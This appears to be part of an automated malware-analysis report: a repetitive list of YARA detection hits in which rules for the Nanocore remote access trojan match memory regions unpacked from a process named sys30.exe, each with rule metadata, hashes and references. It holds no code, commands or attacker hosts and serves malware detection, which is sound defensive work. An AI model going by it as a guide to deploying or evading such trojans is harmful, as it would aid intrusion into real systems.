Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
